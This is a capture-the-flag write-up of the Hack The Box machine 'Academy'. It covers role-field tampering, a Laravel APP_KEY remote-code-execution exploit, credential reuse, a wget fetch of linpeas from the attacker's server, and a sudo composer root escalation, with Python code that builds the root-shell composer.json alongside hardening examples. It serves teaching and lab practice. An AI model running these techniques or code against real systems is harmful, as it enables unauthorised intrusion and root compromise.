[CTF] Hack The Box : Academy

7 min read, Feb 27, 2021

Welcome to this write-up for the machine 'Academy' from the Hack The Box platform. This box is rated easy and was released on November 07, 2020. As it is now retired, we can review it together, get the user flag and finally the root one! If you're ready, let's start!

First, I add the box IP to my hosts file with the hostname academy.htb:

academy in /etc/hosts

Let's start with a classic nmap scan to see the open ports:

nmap -sC -sV academy.htb

Nmap scan results

Two ports are open: SSH on 22 and an Apache web server on 80. So we can go straight to the site; opening it in a browser gives this index page:

Home page

Login and Register links are immediately visible in the top-left corner. I checked the source code, but nothing relevant there, so I act like a normal user and go to the register page to create an account:

Register page

I create an account with a username and a password, confirm it, and get a confirmation that the account was created, so I can log in.

We land on a page with course content, but nothing interesting: every link is fake and it is just a static page with some text; no interaction with my account, nothing I can do. So we start enumeration with gobuster to look for hidden folders or files.

gobuster results

Two interesting files there: admin and config. config.php gives nothing, but admin.php shows a login page. If I try to log in with the credentials I just created, nothing happens.

At this point, I returned to the register page to check its source code, and there is something really unusual:

The registration form contains a hidden field called 'roleid'. If we can change its value, we can probably get an account with more privileges, so I send the form request to Burp:

Then, with Burp Repeater, I just modify roleid from 0 to 1:

The answer is a 302, so it probably worked. I return to the admin page and use the credentials of the account I just created...

Now we have access to the admin page! The 5th row confirms that the form creates a 'basic/student' account by default and that by modifying roleid we created an admin account. Two pieces of information on this page: first, two names, cry0l1t3 and mrb3n, which could be usernames, so we save them in case we find a password. But the main information is on the last row: a subdomain! I add it to my hosts file:
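Before moving on to the subdomain, here is the registration flaw in code. This is an added example for this write-up, not the box's real application: only the field name 'roleid' comes from the page, while the other field names ('uname', 'psw', 'confirm'), the role constants and the HTML form are assumptions for illustration. It parses a constructed register page for hidden inputs (the step done by hand above), then shows a handler that trusts the client's roleid next to one that assigns the role server-side.

```python
"""Added example: hidden 'roleid' field honoured by the server (mass assignment
of a privilege field). Field names other than 'roleid' are assumptions."""
from html.parser import HTMLParser

ROLE_STUDENT = 0   # assumed default the form ships ("basic/student")
ROLE_ADMIN = 1     # assumed value set in Burp Repeater


class HiddenInputFinder(HTMLParser):
    """Collects name/value pairs of <input type="hidden"> elements, the first
    thing to look for when reading a form's source."""

    def __init__(self):
        super().__init__()
        self.hidden = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = dict(attrs)
        if (a.get("type") or "").lower() == "hidden" and a.get("name"):
            self.hidden[a["name"]] = a.get("value") or ""


def find_hidden_inputs(html):
    parser = HiddenInputFinder()
    parser.feed(html)
    return parser.hidden


# Constructed stand-in for the register page source (not the real page).
REGISTER_HTML = """
<form method="post" action="register.php">
  <input type="text" name="uname">
  <input type="password" name="psw">
  <input type="password" name="confirm">
  <input type="hidden" name="roleid" value="0">
  <button type="submit">Register</button>
</form>
"""

USERS = {}  # stand-in for the users table; password hashing omitted on purpose


def register_vulnerable(form):
    """Vulnerable handler: stores whatever roleid the client sent.
    Editing the POST body from roleid=0 to roleid=1 yields an admin."""
    user = {
        "username": form["uname"],
        "password": form["psw"],
        "roleid": int(form.get("roleid", ROLE_STUDENT)),
    }
    USERS[user["username"]] = user
    return user


def register_hardened(form):
    """Hardened handler: reads an allow-list of fields and assigns the role
    server-side; a client-supplied roleid is ignored (a strict app could
    reject the request instead)."""
    allowed = {"uname", "psw", "confirm"}
    unexpected = sorted(set(form) - allowed)
    user = {
        "username": form["uname"],
        "password": form["psw"],
        "roleid": ROLE_STUDENT,        # never taken from the request
        "ignored_fields": unexpected,  # worth logging: it is a probe signal
    }
    USERS[user["username"]] = user
    return user


def can_access_admin(user):
    return user["roleid"] == ROLE_ADMIN


# Constructed POST body, equivalent to the request after the Burp edit.
TAMPERED_FORM = {"uname": "attacker", "psw": "s3cret",
                 "confirm": "s3cret", "roleid": "1"}

if __name__ == "__main__":
    print(find_hidden_inputs(REGISTER_HTML))                     # {'roleid': '0'}
    print(can_access_admin(register_vulnerable(TAMPERED_FORM)))  # True
    print(can_access_admin(register_hardened(TAMPERED_FORM)))    # False
```

The fix is not to validate the hidden value better but to stop reading it at all: a role is a server-side decision, and any unexpected field in a registration request is worth logging.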

When we go to the website, we get something like this:

An error appears, which is presumably expected, because the admin page showed an issue the devs still had to fix. What is interesting is that the error page reveals critical information about the dev environment and sensitive data:

Credentials for a database and an APP_KEY, both of which must stay secret. We can also notice that the site uses Laravel, a popular PHP framework. At this point, I imagine there is a way to use the app key to get a shell through a CVE, or to use the credentials to access the database. The problem is that there is no service like phpMyAdmin or Adminer to reach the database from outside the machine. So we check for a Laravel CVE with searchsploit:

The 6th row, a Metasploit exploit, seems interesting: RCE is what we are looking for. If you don't have this row in your results, your searchsploit may be outdated; update it with 'searchsploit -u'. We launch Metasploit with 'msfconsole' and then search for this exploit by typing 'search laravel'.

We select it with 'use 0' and then look at the options that must be set before running the exploit. Here I provide RHOSTS (the box IP), VHOST (the subdomain, dev-staging-01.academy.htb), LHOST (my HTB VPN IP) and APP_KEY, the value found on the error page.

And we have a shell! It is not a privileged shell, but the foothold mission is complete. The aim now is to log in as a user of the machine; listing the home folder shows two usernames that look familiar: cry0l1t3 and mrb3n.

Looking around the academy website folder, we see that this application is also built with Laravel. We can look into its .env file, the same kind of file we saw on the subdomain with the database credentials and the app key:

There is a password for a database. I tried to log in as 'dev' with this password, but it didn't work. I supposed this password was either a rabbit hole or the password of one of the users. I tried SSH as cry0l1t3 and it works!
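The debug page on the subdomain and the .env file just read are two faces of the same configuration problem. The following is an added example, not the box's code or the author's: a small checker for a Laravel-style .env that flags the settings behind both leaks used in this write-up (APP_DEBUG printing the environment, and a database password that is worth testing against system accounts). SAMPLE_ENV is constructed with placeholder values, not the box's real file, and EXAMPLE_GOOD_KEY is deterministic, so it must never be used as a real APP_KEY.

```python
"""Added example: audit a Laravel-style .env for the settings that made this
box exploitable. Sample values are constructed placeholders."""
import base64
import binascii

SAMPLE_ENV = """\
APP_NAME=Laravel
APP_ENV=local
# 32 bytes of 'A', obviously a placeholder
APP_KEY=base64:QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE=
APP_DEBUG=true
APP_URL=http://localhost

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD="placeholder-not-the-real-one"
"""

# Deterministic 32-byte key for the demo only; never use it for real.
EXAMPLE_GOOD_KEY = "base64:" + base64.b64encode(bytes(range(32))).decode()

# The same file with the three weak settings corrected.
HARDENED_ENV = (
    SAMPLE_ENV.replace("APP_DEBUG=true", "APP_DEBUG=false")
    .replace("APP_ENV=local", "APP_ENV=production")
    .replace("base64:QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE=", EXAMPLE_GOOD_KEY)
)


def parse_env(text):
    """Parse KEY=VALUE lines: skips blanks and comments, strips matching
    quotes, accepts an optional 'export ' prefix."""
    env = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        if line.startswith("export "):
            line = line[len("export "):]
        key, _, value = line.partition("=")
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        env[key.strip()] = value
    return env


def is_truthy(value):
    return value.strip().lower() in {"1", "true", "yes", "on"}


def audit_env(env):
    """Return (setting, finding) pairs for the values that matter here."""
    findings = []
    if is_truthy(env.get("APP_DEBUG", "false")):
        findings.append(("APP_DEBUG", "debug mode on: Laravel's error page dumps "
                         "the environment, APP_KEY and DB_PASSWORD included"))
    if env.get("APP_ENV", "").lower() in {"local", "dev", "development"}:
        findings.append(("APP_ENV", "non-production environment on a reachable host"))
    key = env.get("APP_KEY", "")
    raw = b""
    if key.startswith("base64:"):
        try:
            raw = base64.b64decode(key[len("base64:"):], validate=True)
        except binascii.Error:
            raw = b""
    if len(raw) != 32:   # Laravel's default cipher is AES-256-CBC
        findings.append(("APP_KEY", "missing or malformed; expected 32 key bytes "
                         "(php artisan key:generate)"))
    elif len(set(raw)) < 8:
        findings.append(("APP_KEY", "low-entropy key; anyone who guesses it can "
                         "forge encrypted cookies and payloads"))
    if env.get("DB_PASSWORD"):
        findings.append(("DB_PASSWORD", "present: check it is not reused by a "
                         "system account, the reuse that gave SSH access here"))
    return findings


if __name__ == "__main__":
    for setting, finding in audit_env(parse_env(SAMPLE_ENV)):
        print(f"{setting}: {finding}")
```

The DB_PASSWORD line is deliberately kept as a reminder rather than a defect: a database password in .env is normal, but the file should be unreadable to other users on the host, and the password must not double as a shell password.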

Now we are logged in as a user of the system and can check the home folder for the first flag. You can upgrade your shell with the following command:

python3 -c "import pty; pty.spawn('/bin/bash')"

Last step: privilege escalation, we need root access. 'sudo -l' shows nothing. No cron job of interest. No interesting file in either user's home directory. So we use the linpeas script to look for a privesc path.

First, from my machine, I start a web server on port 8000 with Python:

python3 -m http.server 8000

And from the HTB box, download the script with wget:

wget http://<YOUR_IP>:8000/linpeas.sh

Don't forget to make the file executable:

chmod +x linpeas.sh

Now run the script with './linpeas.sh'.

As the script runs, a very interesting element appears:

We have a password for the user 'mrb3n' in the logs, so let's use it to open a session as this user. We can use SSH from our own terminal, or 'su mrb3n' from the current cry0l1t3 session.

With this user, we repeat the process from cry0l1t3's session: check permissions.

We can run composer with sudo, as root! There is probably a way to take advantage of that. Let's look up composer on GTFOBins:

It is almost over; we just have to run the commands from the sudo section, and...

Here we are, we got root! Now we can read the root flag from the root folder to finish this box.
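For reference, here is what the composer trick relies on, as an added example that is not part of the original write-up or of GTFOBins itself: composer's run-script executes the command string stored under "scripts" in composer.json through the system shell, so when composer runs under sudo that shell is root. The code spots a sudo rule for composer in 'sudo -l' output and writes the composer.json used for the escalation. SUDO_L_SAMPLE is constructed to match the shape 'sudo -l' prints; the script name 'x' and the temporary working directory are arbitrary choices.

```python
"""Added example: sudo rule for composer -> root shell via run-script.
'sudo -l' sample is constructed; script name and workdir are arbitrary."""
import json
import os
import re
import tempfile

SUDO_L_SAMPLE = """\
Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer
"""

# One rule line: "(runas) [NOPASSWD:] /path/to/binary ..."
SUDO_RULE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?:(?P<nopass>NOPASSWD):\s*)?(?P<cmd>/\S+)"
)


def find_sudo_targets(sudo_l_output):
    """Return [(run_as, needs_password, path)] for each rule in 'sudo -l'."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = SUDO_RULE.match(line)
        if m:
            rules.append((m["runas"], m["nopass"] is None, m["cmd"]))
    return rules


def composer_rules(sudo_l_output):
    """Filter the rules down to composer, the binary abused in this box."""
    return [r for r in find_sudo_targets(sudo_l_output)
            if os.path.basename(r[2]) == "composer"]


def build_composer_privesc(workdir=None, shell="/bin/sh"):
    """Write a composer.json whose 'x' script spawns an interactive shell
    (stdin/stdout tied to stderr, the form GTFOBins uses) and return the
    command line that makes sudo'd composer run it."""
    workdir = workdir or tempfile.mkdtemp(prefix="composer-")
    manifest = {"scripts": {"x": f"{shell} -i 0<&2 1>&2"}}
    with open(os.path.join(workdir, "composer.json"), "w") as fh:
        json.dump(manifest, fh)
    cmd = ["sudo", "composer", f"--working-dir={workdir}", "run-script", "x"]
    return {"workdir": workdir, "cmd": cmd}


def read_manifest(workdir):
    with open(os.path.join(workdir, "composer.json")) as fh:
        return json.load(fh)


if __name__ == "__main__":
    if composer_rules(SUDO_L_SAMPLE):
        payload = build_composer_privesc()
        print("composer.json:", read_manifest(payload["workdir"]))
        print("run:", " ".join(payload["cmd"]))
```

There is no safe way to grant composer under sudo: any user who can write a composer.json in a directory of their choice controls the commands it runs, so the fix is to remove the rule, not to restrict its arguments.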

We also get a message from the HTB team promoting their new platform, HTB Academy:

Now this box is entirely finished! I hope you enjoyed it. This Academy box was very pleasant to explore and involved some useful techniques. If you have any question about the box or the article itself, don't hesitate to share it! Have fun, and happy hacking!
